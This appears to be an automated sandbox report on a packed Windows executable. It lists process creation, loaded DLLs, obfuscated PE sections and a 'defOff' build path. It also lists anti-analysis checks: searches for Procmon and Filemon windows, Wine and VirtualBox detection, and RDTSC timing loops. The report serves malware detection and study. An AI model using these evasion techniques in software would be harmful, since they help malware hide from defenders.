            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2000,i,14035377604551262520,15741905147820975122,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,5164532160566674364,7948949956140037157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2000,i,14035377604551262520,15741905147820975122,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,5164532160566674364,7948949956140037157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
            Source: Google Drive.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: file.exeStatic file information: File size 3221504 > 1048576
            Source: file.exeStatic PE information: Raw size of dyyxogva is bigger than: 0x100000 < 0x2b6c00
            Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000002.2395181974.0000000005D52000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2264920965.0000000008140000.00000004.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.da0000.1.unpack :EW;.rsrc:W;.idata :W;dyyxogva:EW;teovkwha:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dyyxogva:EW;teovkwha:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x320dae should be: 0x31923f
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name: dyyxogva
            Source: file.exeStatic PE information: section name: teovkwha
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BC5A push edi; retf 0_3_00D7BC5B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF60 push cs; iretd 0_3_00D7BF63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BF03 push cs; iretd 0_3_00D7BF0B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7BE02 push ebx; iretd 0_3_00D7BE03
            Source: file.exeStatic PE information: section name: entropy: 7.062702525904719

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF6A9 second address: DFF6B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF6B9 second address: DFF6D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7C5AF second address: F7C5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E1BB second address: F6E1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B567 second address: F7B56B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B56B second address: F7B57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jnc 00007FD888F38A26h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B57D second address: F7B582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B99A second address: F7B9C7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD888F38A2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FD888F38A26h 0x00000010 jmp 00007FD888F38A35h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B9C7 second address: F7B9CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B9CB second address: F7B9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jnp 00007FD888F38A26h 0x00000012 pop edi 0x00000013 je 00007FD888F38A2Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B9E6 second address: F7BA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD888D50BF6h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7BA02 second address: F7BA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7BE0F second address: F7BE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7BE15 second address: F7BE41 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD888F38A26h 0x00000008 jmp 00007FD888F38A2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD888F38A31h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EE5E second address: F7EED7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD888D50BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d jns 00007FD888D50BECh 0x00000013 pop edi 0x00000014 nop 0x00000015 call 00007FD888D50BEAh 0x0000001a add di, 206Eh 0x0000001f pop edi 0x00000020 jmp 00007FD888D50BF1h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007FD888D50BE8h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 sub dword ptr [ebp+122D3979h], esi 0x00000047 push A2F18D89h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jnc 00007FD888D50BE6h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EED7 second address: F7EEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EEDC second address: F7EF7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5D0E72F7h 0x00000010 cmc 0x00000011 mov di, 5D45h 0x00000015 push 00000003h 0x00000017 add cl, 00000060h 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D375Eh], edi 0x00000022 push 00000003h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FD888D50BE8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e or dword ptr [ebp+122D23A8h], ebx 0x00000044 call 00007FD888D50BE9h 0x00000049 jl 00007FD888D50BFEh 0x0000004f jmp 00007FD888D50BF8h 0x00000054 push eax 0x00000055 jmp 00007FD888D50BF3h 0x0000005a mov eax, dword ptr [esp+04h] 0x0000005e push eax 0x0000005f push edx 0x00000060 jp 00007FD888D50BECh 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EF7C second address: F7EF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EF80 second address: F7EFA5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD888D50BE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FD888D50BEAh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 js 00007FD888D50BEEh 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F038 second address: F7F03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F03E second address: F7F073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b cld 0x0000000c mov dword ptr [ebp+122D23A8h], ecx 0x00000012 push 00000000h 0x00000014 mov edx, esi 0x00000016 call 00007FD888D50BE9h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD888D50BF2h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F073 second address: F7F07D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD888F38A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
